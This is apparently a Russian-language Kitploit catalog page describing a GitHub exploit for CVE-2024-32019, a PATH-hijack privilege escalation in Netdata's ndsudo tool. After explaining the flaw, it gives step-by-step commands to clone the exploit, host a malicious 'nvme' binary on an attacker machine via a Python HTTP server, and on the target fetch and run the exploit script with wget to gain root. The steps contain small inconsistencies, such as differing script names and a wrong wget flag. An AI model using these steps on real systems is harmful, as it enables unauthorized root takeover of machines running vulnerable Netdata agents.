Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32019-ndsudo — Эксплойт уязвимости NDSUDO | Kitploit
Инструменты/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

Эксплойт уязвимости NDSUDO

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость ndsudo позволяет злоумышленнику получить права root, эксплуатируя ненадёжный путь поиска в инструменте ndsudo, который является частью Netdata Agent. Это может позволить выполнение произвольных программ с повышенными привилегиями, если злоумышленник поместит вредоносный бинарный файл в доступную для записи директорию и соответствующим образом изменит переменную окружения PATH.

Уязвимость ndsudo, идентифицированная как CVE-2024-32019, затрагивает версии инструмента ndsudo, включённые в Netdata Agent, а именно версии v1.45.0 и ниже. Эта уязвимость позволяет злоумышленникам повышать привилегии в системах, где установлен данный инструмент.

Как работает уязвимость:

Механизм эксплуатации:-

Ненадёжный путь поиска: Инструмент ndsudo использует переменную окружения PATH для поиска внешних команд. Злоумышленник может манипулировать этой переменной, чтобы указать на контролируемую им директорию.

Выполнение вредоносных бинарных файлов: Размещая вредоносный исполняемый файл с тем же именем, что и команда, которую ndsudo может
запускать (например, nvme), в доступной для записи директории, злоумышленник может выполнить произвольный код с правами root.

Сложность атаки:-

Низкая сложность: Атака не требует продвинутых навыков; легко создаваемый bash-скрипт может быть использован для повышения привилегий, что делает её доступной для многих потенциальных злоумышленников.

Влияние уязвимости:-

Повышение привилегий: Успешная эксплуатация позволяет злоумышленнику получить доступ root, что может привести к полному контролю над затронутой системой.

Потенциальные риски: Это может привести к несанкционированному доступу к данным, манипуляции системой и дальнейшей эксплуатации сетевых ресурсов.

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ Я создал два bash-скрипта для лёгкого получения доступа от пользователя к root. Следуйте шагам, описанным ниже :-

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

Теперь создайте python сервер :

root@kitploit:~
  python3 -m http.server 8080

Откройте файл ndsudo_exploit.sh с помощью gedit или pluma, в зависимости от того, что доступно. Вы увидите команду wget, подобную этой :

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

Измените ip-адрес на ip вашей собственной машины

Теперь перейдите на целевую машину, откройте терминал и выполните следующее:

root@kitploit:~
  wget http://<your-ip-addr>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
Скачать инструмент